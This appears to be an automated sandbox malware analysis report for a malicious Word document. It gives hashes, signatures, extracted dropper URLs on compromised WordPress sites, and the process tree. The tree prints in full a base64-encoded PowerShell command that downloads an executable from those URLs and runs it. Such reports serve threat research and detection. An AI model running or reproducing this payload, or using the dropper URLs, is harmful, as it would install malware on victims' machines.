Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    117s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    11/06/2024, 13:26

General

  • Target

    9e55777fbab2a50b545186dcd009947f_JaffaCakes118.doc

  • Size

    212KB

  • MD5

    9e55777fbab2a50b545186dcd009947f

  • SHA1

    9085c6254c49ae6c166316f8b9f77a50525ea8aa

  • SHA256

    d8ecaa9d0463137fbd29b7b0e44ec8225fd3fbc3d41a2734fce53ee0f7ae69e4

  • SHA512

    ae5be995e3afc1672cb85485e36950b8271bd2a46490a267ab0201932bb6356ebda0b1ff4753bfbe7bcfdba59a0c43c13755390ef981908f16c95640a4bca36d

  • SSDEEP

    3072:s22TWTogk079THcpOu5UZxnxMNRQBVaexhgs7:s/TX07hHcJQrMNRIVaig+

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://swadgaar.com/wp-admin/f3qB/

exe.dropper

http://oxeir.com/wp-admin/T/

exe.dropper

http://prosperahertz.com/wp-admin/AnnaV/

exe.dropper

http://banglashikhon.com/wp-content/XxI3wH/

exe.dropper

http://iamcyteese.com/wordpress/twv0L/

exe.dropper

http://homehm.xyz/wp-admin/hchhm/

exe.dropper

http://dev.internal.dextrousinfosolutions.com/niamh-quirke-solicitors/g/

Signatures

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9e55777fbab2a50b545186dcd009947f_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2228
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1048
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -en JABNAG4AdgAyAHoAaABtAD0AKAAnAEIAJwArACcAOQBxACcAKwAoACcAdwB0ACcAKwAnADAAYgAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdQBTAEUAcgBwAFIATwBmAEkAbABlAFwAcQBlAGMAVABlAF8ATABcAGQARwBFAEQAMwBRAGoAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBDAFQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBjAGAAVQByAGkAVABgAHkAcABSAGAAbwBgAFQAbwBjAE8ATAAiACAAPQAgACgAKAAnAHQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKwAnACwAIAAnACsAKAAnAHQAbABzACcAKwAnADEAMQAsACcAKQArACgAJwAgAHQAbAAnACsAJwBzACcAKQApADsAJABKAG8AaQB6AGIAdgBxACAAPQAgACgAKAAnAFUAcgAnACsAJwA3ACcAKQArACgAJwA0AHIAJwArACcAcQAnACkAKQA7ACQAWgAyAGIAdQB4AG8AOAA9ACgAKAAnAFgAZgAnACsAJwByAGkAeQBhACcAKQArACcAMQAnACkAOwAkAFoAYwBfAHkANQB0AGEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAVQAnACsAKAAnADgAJwArACcAbgBRACcAKQArACgAJwBlACcAKwAnAGMAdABlAF8AbABVADgAbgBEAGcAZQAnACsAJwBkADMAJwArACcAcQBqACcAKQArACcAVQAnACsAJwA4AG4AJwApAC4AIgBSAEUAcABgAGwAYABBAEMAZQAiACgAKAAnAFUAJwArACcAOABuACcAKQAsACcAXAAnACkAKQArACQASgBvAGkAegBiAHYAcQArACgAJwAuACcAKwAoACcAZQAnACsAJwB4AGUAJwApACkAOwAkAEwANAAwAHMAZwB1ADEAPQAoACgAJwBFACcAKwAnAGUANwBsAGwAdgAnACkAKwAnAHIAJwApADsAJABJAHEAOQB2ADQAegA3AD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAVAAuAFcAZQBiAEMATABpAGUATgBUADsAJABRAGIAXwA0AGEAMwB5AD0AKAAoACcAaAB0AHQAcAAnACsAJwA6AC8AJwArACcALwBzAHcAYQAnACkAKwAoACcAZABnAGEAYQByAC4AYwBvAG0AJwArACcALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAoACcAYQBkAG0AaQAnACsAJwBuAC8AJwArACcAZgAzACcAKQArACgAJwBxAEIAJwArACcALwAnACkAKwAoACcAKgBoAHQAdABwACcAKwAnADoALwAvAG8AJwArACcAeABlAGkAcgAuAGMAbwAnACsAJwBtACcAKQArACcALwB3ACcAKwAnAHAAJwArACgAJwAtAGEAZAAnACsAJwBtAGkAJwArACcAbgAnACkAKwAoACcALwBUACcAKwAnAC8AJwApACsAKAAnACoAaAB0ACcAKwAnAHQAJwArACcAcAA6ACcAKwAnAC8ALwAnACsAJwBwAHIAbwBzACcAKwAnAHAAZQByAGEAaABlAHIAJwArACcAdAB6ACcAKwAnAC4AYwBvAG0ALwB3AHAALQBhACcAKwAnAGQAJwArACcAbQBpACcAKwAnAG4ALwBBAG4AJwArACcAbgBhACcAKQArACgAJwBWACcAKwAnAC8AKgBoACcAKQArACgAJwB0AHQAcAA6AC8AJwArACcALwAnACkAKwAoACcAYgBhAG4AZwBsACcAKwAnAGEAJwApACsAJwBzACcAKwAoACcAaAAnACsAJwBpAGsAaAAnACkAKwAoACcAbwAnACsAJwBuAC4AJwApACsAKAAnAGMAJwArACcAbwBtACcAKQArACgAJwAvAHcAJwArACcAcAAtAGMAbwBuACcAKQArACcAdABlACcAKwAoACcAbgB0AC8AJwArACcAWAAnACkAKwAoACcAeAAnACsAJwBJADMAdwAnACkAKwAoACcASAAvACcAKwAnACoAaAB0AHQAcAA6ACcAKwAnAC8ALwAnACsAJwBpAGEAbQBjAHkAJwApACsAKAAnAHQAZQBlACcAKwAnAHMAZQAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAbwByACcAKQArACgAJwBkAHAAJwArACcAcgBlACcAKQArACcAcwAnACsAKAAnAHMALwAnACsAJwB0ACcAKwAnAHcAdgAwACcAKwAnAEwALwAqAGgAJwArACcAdAB0AHAAJwArACcAOgAnACsAJwAvAC8AaABvAG0AZQBoACcAKQArACcAbQAnACsAKAAnAC4AeAAnACsAJwB5ACcAKQArACgAJwB6AC8AdwBwACcAKwAnAC0AYQBkACcAKwAnAG0AaQBuACcAKQArACgAJwAvAGgAJwArACcAYwBoACcAKQArACgAJwBoACcAKwAnAG0ALwAqAGgAJwArACcAdAB0ACcAKQArACgAJwBwADoALwAnACsAJwAvAGQAZQB2ACcAKQArACcALgBpACcAKwAnAG4AJwArACgAJwB0ACcAKwAnAGUAcgAnACkAKwAnAG4AYQAnACsAKAAnAGwALgAnACsAJwBkAGUAeAAnACkAKwAoACcAdAByAG8AJwArACcAdQAnACkAKwAnAHMAaQAnACsAJwBuAGYAJwArACgAJwBvAHMAbwBsAHUAJwArACcAdABpACcAKwAnAG8AbgBzAC4AYwAnACsAJwBvAG0ALwAnACsAJwBuAGkAYQAnACkAKwAnAG0AJwArACgAJwBoAC0AcQAnACsAJwB1AGkAcgBrACcAKQArACcAZQAnACsAKAAnAC0AcwBvAGwAaQAnACsAJwBjACcAKQArACcAaQAnACsAKAAnAHQAbwByAHMAJwArACcALwBnAC8AJwApACkALgAiAFMAcABMAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQQA4AHcAXwB5AHkAegA9ACgAKAAnAEQAdwB0AHIAJwArACcAYwAnACkAKwAnADEAbwAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABWAGkAcgBzADkAdQAwACAAaQBuACAAJABRAGIAXwA0AGEAMwB5ACkAewB0AHIAeQB7ACQASQBxADkAdgA0AHoANwAuACIARABgAE8AdwBgAE4ATABvAGAAQQBkAEYAaQBMAGUAIgAoACQAVgBpAHIAcwA5AHUAMAAsACAAJABaAGMAXwB5ADUAdABhACkAOwAkAEIAZwBxAF8AdAA5AGoAPQAoACcAQQB5ACcAKwAoACcAbgBzACcAKwAnAHQAJwApACsAJwB2AGEAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFoAYwBfAHkANQB0AGEAKQAuACIAbABlAG4AYABnAFQAaAAiACAALQBnAGUAIAAyADYAOAA2ADMAKQAgAHsAJgAoACcASQBuAHYAJwArACcAbwBrAGUALQAnACsAJwBJACcAKwAnAHQAZQBtACcAKQAoACQAWgBjAF8AeQA1AHQAYQApADsAJABFAGgAMgBwADEAeAA0AD0AKAAoACcARwAnACsAJwBuAHYAYgBpAG0AJwApACsAJwByACcAKQA7AGIAcgBlAGEAawA7ACQAUgBqAGUAZQByADMAZAA9ACgAKAAnAEUAMAAnACsAJwBhACcAKQArACcAawBoACcAKwAnAGcAdQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAMwA4AHMAeAA0AG0APQAoACcAUgA4ACcAKwAoACcAagAnACsAJwB2AHoAJwApACsAJwBvADQAJwApAA==
      1⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2720

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      db71e6fb6f60cc2727bf089b70590d8f

      SHA1

      7e5fcdbbef4a1bd399bb4e2cacf5bcc67483adbe

      SHA256

      157d7084472642579948371d6a7efb2d4da213ad75d593ad39c43e8fceb917c9

      SHA512

      b72a8d2138e8d6b085163fd95f6d2057ddf7cb6abf6d48b009e948a517c88fcdf6502e47c2baff8092c066a1bf57f24668d75c5a0e40ac1073980d65fb8b9214

    • memory/2228-28-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-11-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-6-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-8-0x00000000062F0000-0x00000000063F0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-13-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-14-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-22-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-21-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-23-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-20-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-19-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-18-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-17-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-16-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-15-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-12-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-0-0x000000002F1F1000-0x000000002F1F2000-memory.dmp

      Filesize

      4KB

    • memory/2228-10-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-2-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB

    • memory/2228-9-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-30-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-32-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-31-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-33-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-29-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-27-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-26-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-25-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-24-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-7-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-34-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-67-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB

    • memory/2228-66-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2228-47-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB

    • memory/2228-48-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-49-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2228-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2720-40-0x000000001B640000-0x000000001B922000-memory.dmp

      Filesize

      2.9MB

    • memory/2720-41-0x0000000002860000-0x0000000002868000-memory.dmp

      Filesize

      32KB